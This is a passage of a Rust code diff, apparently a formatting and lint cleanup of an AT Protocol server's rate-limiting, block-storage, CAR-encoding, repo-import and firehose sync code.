108
+
self.account_creation = Arc::new(RateLimiter::keyed(Quota::per_hour(
109
+
NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap()),
110
+
)));
115
111
self
116
112
}
117
113
118
114
pub fn with_email_update_limit(mut self, per_hour: u32) -> Self {
119
-
self.email_update = Arc::new(RateLimiter::keyed(
120
-
Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()))
121
-
));
115
+
self.email_update = Arc::new(RateLimiter::keyed(Quota::per_hour(
116
+
NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap()),
117
+
)));
122
118
self
123
119
}
124
120
}
125
121
126
122
pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String {
127
-
if let Some(forwarded) = headers.get("x-forwarded-for") {
128
-
if let Ok(value) = forwarded.to_str() {
129
-
if let Some(first_ip) = value.split(',').next() {
123
+
if let Some(forwarded) = headers.get("x-forwarded-for")
124
+
&& let Ok(value) = forwarded.to_str()
125
+
&& let Some(first_ip) = value.split(',').next() {
130
126
return first_ip.trim().to_string();
131
127
}
132
-
}
133
-
}
134
128
135
-
if let Some(real_ip) = headers.get("x-real-ip") {
136
-
if let Ok(value) = real_ip.to_str() {
129
+
if let Some(real_ip) = headers.get("x-real-ip")
130
+
&& let Ok(value) = real_ip.to_str() {
137
131
return value.trim().to_string();
138
132
}
139
-
}
140
133
141
-
addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string())
134
+
addr.map(|a| a.ip().to_string())
135
+
.unwrap_or_else(|| "unknown".to_string())
142
136
}
143
137
144
138
fn rate_limit_response() -> Response {
+18
-10
src/repo/mod.rs
+18
-10
src/repo/mod.rs
···
27
27
let row = sqlx::query!("SELECT data FROM blocks WHERE cid = $1", &cid_bytes)
28
28
.fetch_optional(&self.pool)
29
29
.await
30
-
.map_err(|e| RepoError::storage(e))?;
30
+
.map_err(RepoError::storage)?;
31
31
match row {
32
32
Some(row) => Ok(Some(Bytes::from(row.data))),
33
33
None => Ok(None),
···
39
39
let mut hasher = Sha256::new();
40
40
hasher.update(data);
41
41
let hash = hasher.finalize();
42
-
let multihash = Multihash::wrap(0x12, &hash)
43
-
.map_err(|e| RepoError::storage(std::io::Error::new(std::io::ErrorKind::InvalidData, format!("Failed to wrap multihash: {:?}", e))))?;
42
+
let multihash = Multihash::wrap(0x12, &hash).map_err(|e| {
43
+
RepoError::storage(std::io::Error::new(
44
+
std::io::ErrorKind::InvalidData,
45
+
format!("Failed to wrap multihash: {:?}", e),
46
+
))
47
+
})?;
44
48
let cid = Cid::new_v1(0x71, multihash);
45
49
let cid_bytes = cid.to_bytes();
46
-
sqlx::query!("INSERT INTO blocks (cid, data) VALUES ($1, $2) ON CONFLICT (cid) DO NOTHING", &cid_bytes, data)
47
-
.execute(&self.pool)
48
-
.await
49
-
.map_err(|e| RepoError::storage(e))?;
50
+
sqlx::query!(
51
+
"INSERT INTO blocks (cid, data) VALUES ($1, $2) ON CONFLICT (cid) DO NOTHING",
52
+
&cid_bytes,
53
+
data
54
+
)
55
+
.execute(&self.pool)
56
+
.await
57
+
.map_err(RepoError::storage)?;
50
58
Ok(cid)
51
59
}
52
60
···
56
64
let row = sqlx::query!("SELECT 1 as one FROM blocks WHERE cid = $1", &cid_bytes)
57
65
.fetch_optional(&self.pool)
58
66
.await
59
-
.map_err(|e| RepoError::storage(e))?;
67
+
.map_err(RepoError::storage)?;
60
68
Ok(row.is_some())
61
69
}
62
70
···
82
90
)
83
91
.execute(&self.pool)
84
92
.await
85
-
.map_err(|e| RepoError::storage(e))?;
93
+
.map_err(RepoError::storage)?;
86
94
Ok(())
87
95
}
88
96
···
98
106
)
99
107
.fetch_all(&self.pool)
100
108
.await
101
-
.map_err(|e| RepoError::storage(e))?;
109
+
.map_err(RepoError::storage)?;
102
110
let found: std::collections::HashMap<Vec<u8>, Bytes> = rows
103
111
.into_iter()
104
112
.map(|row| (row.cid, Bytes::from(row.data)))
+15
-7
src/repo/tracking.rs
+15
-7
src/repo/tracking.rs
···
51
51
let result = self.inner.get(cid).await?;
52
52
if result.is_some() {
53
53
match self.read_cids.lock() {
54
-
Ok(mut guard) => { guard.insert(*cid); },
55
-
Err(poisoned) => { poisoned.into_inner().insert(*cid); },
54
+
Ok(mut guard) => {
55
+
guard.insert(*cid);
56
+
}
57
+
Err(poisoned) => {
58
+
poisoned.into_inner().insert(*cid);
59
+
}
56
60
}
57
61
}
58
62
Ok(result)
···
61
65
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
62
66
let cid = self.inner.put(data).await?;
63
67
match self.written_cids.lock() {
64
-
Ok(mut guard) => guard.push(cid.clone()),
65
-
Err(poisoned) => poisoned.into_inner().push(cid.clone()),
68
+
Ok(mut guard) => guard.push(cid),
69
+
Err(poisoned) => poisoned.into_inner().push(cid),
66
70
}
67
71
Ok(cid)
68
72
}
···
76
80
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
77
81
) -> Result<(), RepoError> {
78
82
let blocks: Vec<_> = blocks.into_iter().collect();
79
-
let cids: Vec<Cid> = blocks.iter().map(|(cid, _)| cid.clone()).collect();
83
+
let cids: Vec<Cid> = blocks.iter().map(|(cid, _)| *cid).collect();
80
84
self.inner.put_many(blocks).await?;
81
85
match self.written_cids.lock() {
82
86
Ok(mut guard) => guard.extend(cids),
···
90
94
for (cid, result) in cids.iter().zip(results.iter()) {
91
95
if result.is_some() {
92
96
match self.read_cids.lock() {
93
-
Ok(mut guard) => { guard.insert(*cid); },
94
-
Err(poisoned) => { poisoned.into_inner().insert(*cid); },
97
+
Ok(mut guard) => {
98
+
guard.insert(*cid);
99
+
}
100
+
Err(poisoned) => {
101
+
poisoned.into_inner().insert(*cid);
102
+
}
95
103
}
96
104
}
97
105
}
+5
-1
src/state.rs
+5
-1
src/state.rs
···
117
117
let limiter_name = kind.key_prefix();
118
118
let (limit, window_ms) = kind.limit_and_window_ms();
119
119
120
-
if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await {
120
+
if !self
121
+
.distributed_rate_limiter
122
+
.check_rate_limit(&key, limit, window_ms)
123
+
.await
124
+
{
121
125
crate::metrics::record_rate_limit_rejection(limiter_name);
122
126
return false;
123
127
}
+4
-2
src/storage/mod.rs
+4
-2
src/storage/mod.rs
···
62
62
}
63
63
64
64
async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> {
65
-
let result = self.client
65
+
let result = self
66
+
.client
66
67
.put_object()
67
68
.bucket(&self.bucket)
68
69
.key(key)
···
112
113
}
113
114
114
115
async fn delete(&self, key: &str) -> Result<(), StorageError> {
115
-
let result = self.client
116
+
let result = self
117
+
.client
116
118
.delete_object()
117
119
.bucket(&self.bucket)
118
120
.key(key)
+9
-13
src/sync/blob.rs
+9
-13
src/sync/blob.rs
···
58
58
}
59
59
Ok(Some(_)) => {}
60
60
}
61
-
let blob_result = sqlx::query!("SELECT storage_key, mime_type FROM blobs WHERE cid = $1", cid)
62
-
.fetch_optional(&state.db)
63
-
.await;
61
+
let blob_result = sqlx::query!(
62
+
"SELECT storage_key, mime_type FROM blobs WHERE cid = $1",
63
+
cid
64
+
)
65
+
.fetch_optional(&state.db)
66
+
.await;
64
67
match blob_result {
65
68
Ok(Some(row)) => {
66
69
let storage_key = &row.storage_key;
67
70
let mime_type = &row.mime_type;
68
-
match state.blob_store.get(&storage_key).await {
71
+
match state.blob_store.get(storage_key).await {
69
72
Ok(data) => Response::builder()
70
73
.status(StatusCode::OK)
71
74
.header(header::CONTENT_TYPE, mime_type)
···
184
187
match cids_result {
185
188
Ok(cids) => {
186
189
let has_more = cids.len() as i64 > limit;
187
-
let cids: Vec<String> = cids
188
-
.into_iter()
189
-
.take(limit as usize)
190
-
.collect();
191
-
let next_cursor = if has_more {
192
-
cids.last().cloned()
193
-
} else {
194
-
None
195
-
};
190
+
let cids: Vec<String> = cids.into_iter().take(limit as usize).collect();
191
+
let next_cursor = if has_more { cids.last().cloned() } else { None };
196
192
(
197
193
StatusCode::OK,
198
194
Json(ListBlobsOutput {
+4
-2
src/sync/car.rs
+4
-2
src/sync/car.rs
···
24
24
}
25
25
26
26
pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> {
27
-
let header = CarHeader::new_v1(vec![root_cid.clone()]);
28
-
let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
27
+
let header = CarHeader::new_v1(vec![*root_cid]);
28
+
let header_cbor = header
29
+
.encode()
30
+
.map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
29
31
let mut result = Vec::new();
30
32
write_varint(&mut result, header_cbor.len() as u64)
31
33
.expect("Writing to Vec<u8> should never fail");
+4
-2
src/sync/commit.rs
+4
-2
src/sync/commit.rs
···
56
56
.await;
57
57
match result {
58
58
Ok(Some(row)) => {
59
-
let rev = get_rev_from_commit(&state, &row.repo_root_cid).await
59
+
let rev = get_rev_from_commit(&state, &row.repo_root_cid)
60
+
.await
60
61
.unwrap_or_else(|| chrono::Utc::now().timestamp_millis().to_string());
61
62
(
62
63
StatusCode::OK,
···
129
130
let has_more = rows.len() as i64 > limit;
130
131
let mut repos: Vec<RepoInfo> = Vec::new();
131
132
for row in rows.iter().take(limit as usize) {
132
-
let rev = get_rev_from_commit(&state, &row.repo_root_cid).await
133
+
let rev = get_rev_from_commit(&state, &row.repo_root_cid)
134
+
.await
133
135
.unwrap_or_else(|| chrono::Utc::now().timestamp_millis().to_string());
134
136
repos.push(RepoInfo {
135
137
did: row.did.clone(),
+11
-3
src/sync/deprecated.rs
+11
-3
src/sync/deprecated.rs
···
51
51
.fetch_optional(&state.db)
52
52
.await;
53
53
match result {
54
-
Ok(Some(row)) => (StatusCode::OK, Json(GetHeadOutput { root: row.repo_root_cid })).into_response(),
54
+
Ok(Some(row)) => (
55
+
StatusCode::OK,
56
+
Json(GetHeadOutput {
57
+
root: row.repo_root_cid,
58
+
}),
59
+
)
60
+
.into_response(),
55
61
Ok(None) => (
56
62
StatusCode::BAD_REQUEST,
57
63
Json(json!({"error": "HeadNotFound", "message": "Could not find root for DID"})),
···
157
163
let mut writer = Vec::new();
158
164
crate::sync::car::write_varint(&mut writer, total_len as u64)
159
165
.expect("Writing to Vec<u8> should never fail");
160
-
writer.write_all(&cid_bytes)
166
+
writer
167
+
.write_all(&cid_bytes)
161
168
.expect("Writing to Vec<u8> should never fail");
162
-
writer.write_all(&block)
169
+
writer
170
+
.write_all(&block)
163
171
.expect("Writing to Vec<u8> should never fail");
164
172
car_bytes.extend_from_slice(&writer);
165
173
if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) {
+1
-1
src/sync/firehose.rs
+1
-1
src/sync/firehose.rs
+12
-10
src/sync/frame.rs
+12
-10
src/sync/frame.rs
···
1
+
use crate::sync::firehose::SequencedEvent;
1
2
use cid::Cid;
2
3
use serde::{Deserialize, Serialize};
3
4
use std::str::FromStr;
4
-
use crate::sync::firehose::SequencedEvent;
5
5
6
6
#[derive(Debug, Serialize, Deserialize)]
7
7
pub struct FrameHeader {
···
86
86
87
87
impl CommitFrameBuilder {
88
88
pub fn build(self) -> Result<CommitFrame, &'static str> {
89
-
let commit_cid = Cid::from_str(&self.commit_cid_str)
90
-
.map_err(|_| "Invalid commit CID")?;
91
-
let json_ops: Vec<JsonRepoOp> = serde_json::from_value(self.ops_json)
92
-
.unwrap_or_else(|_| vec![]);
93
-
let ops: Vec<RepoOp> = json_ops.into_iter().map(|op| {
94
-
RepoOp {
89
+
let commit_cid = Cid::from_str(&self.commit_cid_str).map_err(|_| "Invalid commit CID")?;
90
+
let json_ops: Vec<JsonRepoOp> =
91
+
serde_json::from_value(self.ops_json).unwrap_or_else(|_| vec![]);
92
+
let ops: Vec<RepoOp> = json_ops
93
+
.into_iter()
94
+
.map(|op| RepoOp {
95
95
action: op.action,
96
96
path: op.path,
97
97
cid: op.cid.and_then(|s| Cid::from_str(&s).ok()),
98
98
prev: op.prev.and_then(|s| Cid::from_str(&s).ok()),
99
-
}
100
-
}).collect();
101
-
let blobs: Vec<Cid> = self.blobs.iter()
99
+
})
100
+
.collect();
101
+
let blobs: Vec<Cid> = self
102
+
.blobs
103
+
.iter()
102
104
.filter_map(|s| Cid::from_str(s).ok())
103
105
.collect();
104
106
let rev = placeholder_rev();
+31
-25
src/sync/import.rs
+31
-25
src/sync/import.rs
···
75
75
.flat_map(|v| find_blob_refs_ipld(v, depth + 1))
76
76
.collect(),
77
77
Ipld::Map(obj) => {
78
-
if let Some(Ipld::String(type_str)) = obj.get("$type") {
79
-
if type_str == "blob" {
80
-
if let Some(Ipld::Link(link_cid)) = obj.get("ref") {
81
-
let mime = obj
82
-
.get("mimeType")
83
-
.and_then(|v| if let Ipld::String(s) = v { Some(s.clone()) } else { None });
78
+
if let Some(Ipld::String(type_str)) = obj.get("$type")
79
+
&& type_str == "blob"
80
+
&& let Some(Ipld::Link(link_cid)) = obj.get("ref") {
81
+
let mime = obj.get("mimeType").and_then(|v| {
82
+
if let Ipld::String(s) = v {
83
+
Some(s.clone())
84
+
} else {
85
+
None
86
+
}
87
+
});
84
88
return vec![BlobRef {
85
89
cid: link_cid.to_string(),
86
90
mime_type: mime,
87
91
}];
88
92
}
89
-
}
90
-
}
91
93
obj.values()
92
94
.flat_map(|v| find_blob_refs_ipld(v, depth + 1))
93
95
.collect()
···
106
108
.flat_map(|v| find_blob_refs(v, depth + 1))
107
109
.collect(),
108
110
JsonValue::Object(obj) => {
109
-
if let Some(JsonValue::String(type_str)) = obj.get("$type") {
110
-
if type_str == "blob" {
111
-
if let Some(JsonValue::Object(ref_obj)) = obj.get("ref") {
112
-
if let Some(JsonValue::String(link)) = ref_obj.get("$link") {
111
+
if let Some(JsonValue::String(type_str)) = obj.get("$type")
112
+
&& type_str == "blob"
113
+
&& let Some(JsonValue::Object(ref_obj)) = obj.get("ref")
114
+
&& let Some(JsonValue::String(link)) = ref_obj.get("$link") {
113
115
let mime = obj
114
116
.get("mimeType")
115
117
.and_then(|v| v.as_str())
···
119
121
mime_type: mime,
120
122
}];
121
123
}
122
-
}
123
-
}
124
-
}
125
124
obj.values()
126
125
.flat_map(|v| find_blob_refs(v, depth + 1))
127
126
.collect()
···
194
193
None
195
194
}
196
195
});
197
-
if let (Some(key), Some(record_cid)) = (key, record_cid) {
198
-
if let Some(record_block) = blocks.get(&record_cid) {
199
-
if let Ok(record_value) =
196
+
if let (Some(key), Some(record_cid)) = (key, record_cid)
197
+
&& let Some(record_block) = blocks.get(&record_cid)
198
+
&& let Ok(record_value) =
200
199
serde_ipld_dagcbor::from_slice::<Ipld>(record_block)
201
200
{
202
201
let blob_refs = find_blob_refs_ipld(&record_value, 0);
···
212
211
});
213
212
}
214
213
}
215
-
}
216
-
}
217
214
if let Some(Ipld::Link(tree_cid)) = entry_obj.get("t") {
218
215
stack.push(*tree_cid);
219
216
}
···
236
233
fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> {
237
234
let obj = match commit {
238
235
Ipld::Map(m) => m,
239
-
_ => return Err(ImportError::InvalidCommit("Commit must be a map".to_string())),
236
+
_ => {
237
+
return Err(ImportError::InvalidCommit(
238
+
"Commit must be a map".to_string(),
239
+
));
240
+
}
240
241
};
241
242
let data_cid = obj
242
243
.get("data")
243
-
.and_then(|d| if let Ipld::Link(cid) = d { Some(*cid) } else { None })
244
+
.and_then(|d| {
245
+
if let Ipld::Link(cid) = d {
246
+
Some(*cid)
247
+
} else {
248
+
None
249
+
}
250
+
})
244
251
.ok_or_else(|| ImportError::InvalidCommit("Missing data field".to_string()))?;
245
252
let rev = obj.get("rev").and_then(|r| {
246
253
if let Ipld::String(s) = r {
···
292
299
.fetch_optional(&mut *tx)
293
300
.await
294
301
.map_err(|e| {
295
-
if let sqlx::Error::Database(ref db_err) = e {
296
-
if db_err.code().as_deref() == Some("55P03") {
302
+
if let sqlx::Error::Database(ref db_err) = e
303
+
&& db_err.code().as_deref() == Some("55P03") {
297
304
return ImportError::ConcurrentModification;
298
305
}
299
-
}
300
306
ImportError::Database(e)
301
307
})?;
302
308
if repo.is_none() {
+23
-5
src/sync/listener.rs
+23
-5
src/sync/listener.rs
···
43
43
.fetch_all(&state.db)
44
44
.await?;
45
45
if !events.is_empty() {
46
-
info!(count = events.len(), from_seq = catchup_start, "Broadcasting catch-up events");
46
+
info!(
47
+
count = events.len(),
48
+
from_seq = catchup_start,
49
+
"Broadcasting catch-up events"
50
+
);
47
51
for event in events {
48
52
let seq = event.seq;
49
53
let _ = state.firehose_tx.send(event);
···
57
61
let seq_id: i64 = match payload.parse() {
58
62
Ok(id) => id,
59
63
Err(e) => {
60
-
warn!("Received invalid payload in repo_updates: '{}'. Error: {}", payload, e);
64
+
warn!(
65
+
"Received invalid payload in repo_updates: '{}'. Error: {}",
66
+
payload, e
67
+
);
61
68
continue;
62
69
}
63
70
};
64
71
let last_seq = LAST_BROADCAST_SEQ.load(Ordering::SeqCst);
65
72
if seq_id <= last_seq {
66
-
debug!(seq = seq_id, last = last_seq, "Skipping already-broadcast event");
73
+
debug!(
74
+
seq = seq_id,
75
+
last = last_seq,
76
+
"Skipping already-broadcast event"
77
+
);
67
78
continue;
68
79
}
69
80
if seq_id > last_seq + 1 {
···
103
114
if let Some(event) = event {
104
115
match state.firehose_tx.send(event) {
105
116
Ok(receiver_count) => {
106
-
debug!(seq = seq_id, receivers = receiver_count, "Broadcast event to firehose");
117
+
debug!(
118
+
seq = seq_id,
119
+
receivers = receiver_count,
120
+
"Broadcast event to firehose"
121
+
);
107
122
}
108
123
Err(e) => {
109
124
warn!(seq = seq_id, error = %e, "Failed to broadcast event (no receivers?)");
···
111
126
}
112
127
LAST_BROADCAST_SEQ.store(seq_id, Ordering::SeqCst);
113
128
} else {
114
-
warn!(seq = seq_id, "Received notification but could not find row in repo_seq");
129
+
warn!(
130
+
seq = seq_id,
131
+
"Received notification but could not find row in repo_seq"
132
+
);
115
133
}
116
134
}
117
135
}
+20
-12
src/sync/repo.rs
+20
-12
src/sync/repo.rs
···
1
1
use crate::state::AppState;
2
2
use crate::sync::car::encode_car_header;
3
3
use axum::{
4
+
Json,
4
5
extract::{Query, State},
5
6
http::StatusCode,
6
7
response::{IntoResponse, Response},
7
-
Json,
8
8
};
9
9
use cid::Cid;
10
10
use ipld_core::ipld::Ipld;
···
51
51
}
52
52
};
53
53
if cids.is_empty() {
54
-
return (StatusCode::BAD_REQUEST, "No CIDs provided").into_response();
54
+
return (StatusCode::BAD_REQUEST, "No CIDs provided").into_response();
55
55
}
56
56
let root_cid = cids[0];
57
57
let header = match encode_car_header(&root_cid) {
···
70
70
let mut writer = Vec::new();
71
71
crate::sync::car::write_varint(&mut writer, total_len as u64)
72
72
.expect("Writing to Vec<u8> should never fail");
73
-
writer.write_all(&cid_bytes)
73
+
writer
74
+
.write_all(&cid_bytes)
74
75
.expect("Writing to Vec<u8> should never fail");
75
-
writer.write_all(&block)
76
+
writer
77
+
.write_all(&block)
76
78
.expect("Writing to Vec<u8> should never fail");
77
79
car_bytes.extend_from_slice(&writer);
78
80
}
···
115
117
.await
116
118
.unwrap_or(None);
117
119
if user_exists.is_none() {
118
-
return (
120
+
return (
119
121
StatusCode::NOT_FOUND,
120
122
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
121
123
)
122
124
.into_response();
123
125
} else {
124
-
return (
126
+
return (
125
127
StatusCode::NOT_FOUND,
126
128
Json(json!({"error": "RepoNotFound", "message": "Repo not initialized"})),
127
129
)
···
157
159
continue;
158
160
}
159
161
visited.insert(cid);
160
-
if remaining == 0 { break; }
162
+
if remaining == 0 {
163
+
break;
164
+
}
161
165
remaining -= 1;
162
166
if let Ok(Some(block)) = state.block_store.get(&cid).await {
163
167
let cid_bytes = cid.to_bytes();
···
165
169
let mut writer = Vec::new();
166
170
crate::sync::car::write_varint(&mut writer, total_len as u64)
167
171
.expect("Writing to Vec<u8> should never fail");
168
-
writer.write_all(&cid_bytes)
172
+
writer
173
+
.write_all(&cid_bytes)
169
174
.expect("Writing to Vec<u8> should never fail");
170
-
writer.write_all(&block)
175
+
writer
176
+
.write_all(&block)
171
177
.expect("Writing to Vec<u8> should never fail");
172
178
car_bytes.extend_from_slice(&writer);
173
179
if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) {
···
300
306
}
301
307
};
302
308
let mut proof_blocks: BTreeMap<Cid, bytes::Bytes> = BTreeMap::new();
303
-
if let Err(_) = mst.blocks_for_path(&key, &mut proof_blocks).await {
309
+
if mst.blocks_for_path(&key, &mut proof_blocks).await.is_err() {
304
310
return (
305
311
StatusCode::INTERNAL_SERVER_ERROR,
306
312
Json(json!({"error": "InternalError", "message": "Failed to build proof path"})),
···
325
331
let mut writer = Vec::new();
326
332
crate::sync::car::write_varint(&mut writer, total_len as u64)
327
333
.expect("Writing to Vec<u8> should never fail");
328
-
writer.write_all(&cid_bytes)
334
+
writer
335
+
.write_all(&cid_bytes)
329
336
.expect("Writing to Vec<u8> should never fail");
330
-
writer.write_all(data)
337
+
writer
338
+
.write_all(data)
331
339
.expect("Writing to Vec<u8> should never fail");
332
340
car.extend_from_slice(&writer);
333
341
};
+17
-10
src/sync/subscribe_repos.rs
+17
-10
src/sync/subscribe_repos.rs
···
1
1
use crate::state::AppState;
2
2
use crate::sync::firehose::SequencedEvent;
3
-
use crate::sync::util::{format_event_for_sending, format_event_with_prefetched_blocks, prefetch_blocks_for_events};
3
+
use crate::sync::util::{
4
+
format_event_for_sending, format_event_with_prefetched_blocks, prefetch_blocks_for_events,
5
+
};
4
6
use axum::{
5
-
extract::{ws::Message, ws::WebSocket, ws::WebSocketUpgrade, Query, State},
7
+
extract::{Query, State, ws::Message, ws::WebSocket, ws::WebSocketUpgrade},
6
8
response::Response,
7
9
};
8
10
use futures::{sink::SinkExt, stream::StreamExt};
···
53
55
info!(subscribers = count, "Firehose subscriber disconnected");
54
56
}
55
57
56
-
async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> {
58
+
async fn handle_socket_inner(
59
+
socket: &mut WebSocket,
60
+
state: &AppState,
61
+
params: SubscribeReposParams,
62
+
) -> Result<(), ()> {
57
63
if let Some(cursor) = params.cursor {
58
64
let mut current_cursor = cursor;
59
65
loop {
···
87
93
};
88
94
for event in events {
89
95
current_cursor = event.seq;
90
-
let bytes = match format_event_with_prefetched_blocks(event, &prefetched).await {
91
-
Ok(b) => b,
92
-
Err(e) => {
93
-
warn!("Failed to format backfill event: {}", e);
94
-
return Err(());
95
-
}
96
-
};
96
+
let bytes =
97
+
match format_event_with_prefetched_blocks(event, &prefetched).await {
98
+
Ok(b) => b,
99
+
Err(e) => {
100
+
warn!("Failed to format backfill event: {}", e);
101
+
return Err(());
102
+
}
103
+
};
97
104
if let Err(e) = socket.send(Message::Binary(bytes.into())).await {
98
105
warn!("Failed to send backfill event: {}", e);
99
106
return Err(());
+52
-39
src/sync/util.rs
+52
-39
src/sync/util.rs
···
12
12
use tokio::io::AsyncWriteExt;
13
13
14
14
fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> {
15
-
Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string())
15
+
Commit::from_cbor(commit_bytes)
16
+
.ok()
17
+
.map(|c| c.rev().to_string())
16
18
}
17
19
18
20
async fn write_car_blocks(
···
25
27
let mut writer = CarWriter::new(header, &mut buffer);
26
28
for (cid, data) in other_blocks {
27
29
if cid != commit_cid {
28
-
writer.write(cid, data.as_ref()).await
30
+
writer
31
+
.write(cid, data.as_ref())
32
+
.await
29
33
.map_err(|e| anyhow::anyhow!("writing block {}: {}", cid, e))?;
30
34
}
31
35
}
32
36
if let Some(data) = commit_bytes {
33
-
writer.write(commit_cid, data.as_ref()).await
37
+
writer
38
+
.write(commit_cid, data.as_ref())
39
+
.await
34
40
.map_err(|e| anyhow::anyhow!("writing commit block: {}", e))?;
35
41
}
36
-
writer.finish().await
42
+
writer
43
+
.finish()
44
+
.await
37
45
.map_err(|e| anyhow::anyhow!("finalizing CAR: {}", e))?;
38
-
buffer.flush().await
46
+
buffer
47
+
.flush()
48
+
.await
39
49
.map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?;
40
50
Ok(buffer.into_inner())
41
51
}
···
83
93
state: &AppState,
84
94
event: &SequencedEvent,
85
95
) -> Result<Vec<u8>, anyhow::Error> {
86
-
let commit_cid_str = event.commit_cid.as_ref()
96
+
let commit_cid_str = event
97
+
.commit_cid
98
+
.as_ref()
87
99
.ok_or_else(|| anyhow::anyhow!("Sync event missing commit_cid"))?;
88
100
let commit_cid = Cid::from_str(commit_cid_str)?;
89
-
let commit_bytes = state.block_store.get(&commit_cid).await?
101
+
let commit_bytes = state
102
+
.block_store
103
+
.get(&commit_cid)
104
+
.await?
90
105
.ok_or_else(|| anyhow::anyhow!("Commit block not found"))?;
91
106
let rev = extract_rev_from_commit_bytes(&commit_bytes)
92
107
.ok_or_else(|| anyhow::anyhow!("Could not extract rev from commit"))?;
···
121
136
let block_cids_str = event.blocks_cids.clone().unwrap_or_default();
122
137
let prev_cid_str = event.prev_cid.clone();
123
138
let prev_data_cid_str = event.prev_data_cid.clone();
124
-
let mut frame: CommitFrame = event.try_into()
139
+
let mut frame: CommitFrame = event
140
+
.try_into()
125
141
.map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?;
126
-
if let Some(ref pdc) = prev_data_cid_str {
127
-
if let Ok(cid) = Cid::from_str(pdc) {
142
+
if let Some(ref pdc) = prev_data_cid_str
143
+
&& let Ok(cid) = Cid::from_str(pdc) {
128
144
frame.prev_data = Some(cid);
129
145
}
130
-
}
131
146
let commit_cid = frame.commit;
132
147
let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok());
133
148
let mut all_cids: Vec<Cid> = block_cids_str
···
138
153
if !all_cids.contains(&commit_cid) {
139
154
all_cids.push(commit_cid);
140
155
}
141
-
if let Some(ref pc) = prev_cid {
142
-
if let Ok(Some(prev_bytes)) = state.block_store.get(pc).await {
143
-
if let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) {
156
+
if let Some(ref pc) = prev_cid
157
+
&& let Ok(Some(prev_bytes)) = state.block_store.get(pc).await
158
+
&& let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) {
144
159
frame.since = Some(rev);
145
160
}
146
-
}
147
-
}
148
161
let car_bytes = if !all_cids.is_empty() {
149
162
let fetched = state.block_store.get_many(&all_cids).await?;
150
163
let mut blocks = std::collections::BTreeMap::new();
···
182
195
) -> Result<HashMap<Cid, Bytes>, anyhow::Error> {
183
196
let mut all_cids: Vec<Cid> = Vec::new();
184
197
for event in events {
185
-
if let Some(ref commit_cid_str) = event.commit_cid {
186
-
if let Ok(cid) = Cid::from_str(commit_cid_str) {
198
+
if let Some(ref commit_cid_str) = event.commit_cid
199
+
&& let Ok(cid) = Cid::from_str(commit_cid_str) {
187
200
all_cids.push(cid);
188
201
}
189
-
}
190
-
if let Some(ref prev_cid_str) = event.prev_cid {
191
-
if let Ok(cid) = Cid::from_str(prev_cid_str) {
202
+
if let Some(ref prev_cid_str) = event.prev_cid
203
+
&& let Ok(cid) = Cid::from_str(prev_cid_str) {
192
204
all_cids.push(cid);
193
205
}
194
-
}
195
206
if let Some(ref block_cids_str) = event.blocks_cids {
196
207
for s in block_cids_str {
197
208
if let Ok(cid) = Cid::from_str(s) {
···
219
230
event: &SequencedEvent,
220
231
prefetched: &HashMap<Cid, Bytes>,
221
232
) -> Result<Vec<u8>, anyhow::Error> {
222
-
let commit_cid_str = event.commit_cid.as_ref()
233
+
let commit_cid_str = event
234
+
.commit_cid
235
+
.as_ref()
223
236
.ok_or_else(|| anyhow::anyhow!("Sync event missing commit_cid"))?;
224
237
let commit_cid = Cid::from_str(commit_cid_str)?;
225
-
let commit_bytes = prefetched.get(&commit_cid)
238
+
let commit_bytes = prefetched
239
+
.get(&commit_cid)
226
240
.ok_or_else(|| anyhow::anyhow!("Commit block not found in prefetched"))?;
227
241
let rev = extract_rev_from_commit_bytes(commit_bytes)
228
242
.ok_or_else(|| anyhow::anyhow!("Could not extract rev from commit"))?;
229
-
let car_bytes = futures::executor::block_on(
230
-
write_car_blocks(commit_cid, Some(commit_bytes.clone()), BTreeMap::new())
231
-
)?;
243
+
let car_bytes = futures::executor::block_on(write_car_blocks(
244
+
commit_cid,
245
+
Some(commit_bytes.clone()),
246
+
BTreeMap::new(),
247
+
))?;
232
248
let frame = SyncFrame {
233
249
did: event.did.clone(),
234
250
rev,
···
259
275
let block_cids_str = event.blocks_cids.clone().unwrap_or_default();
260
276
let prev_cid_str = event.prev_cid.clone();
261
277
let prev_data_cid_str = event.prev_data_cid.clone();
262
-
let mut frame: CommitFrame = event.try_into()
278
+
let mut frame: CommitFrame = event
279
+
.try_into()
263
280
.map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?;
264
-
if let Some(ref pdc) = prev_data_cid_str {
265
-
if let Ok(cid) = Cid::from_str(pdc) {
281
+
if let Some(ref pdc) = prev_data_cid_str
282
+
&& let Ok(cid) = Cid::from_str(pdc) {
266
283
frame.prev_data = Some(cid);
267
284
}
268
-
}
269
285
let commit_cid = frame.commit;
270
286
let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok());
271
287
let mut all_cids: Vec<Cid> = block_cids_str
···
276
292
if !all_cids.contains(&commit_cid) {
277
293
all_cids.push(commit_cid);
278
294
}
279
-
if let Some(commit_bytes) = prefetched.get(&commit_cid) {
280
-
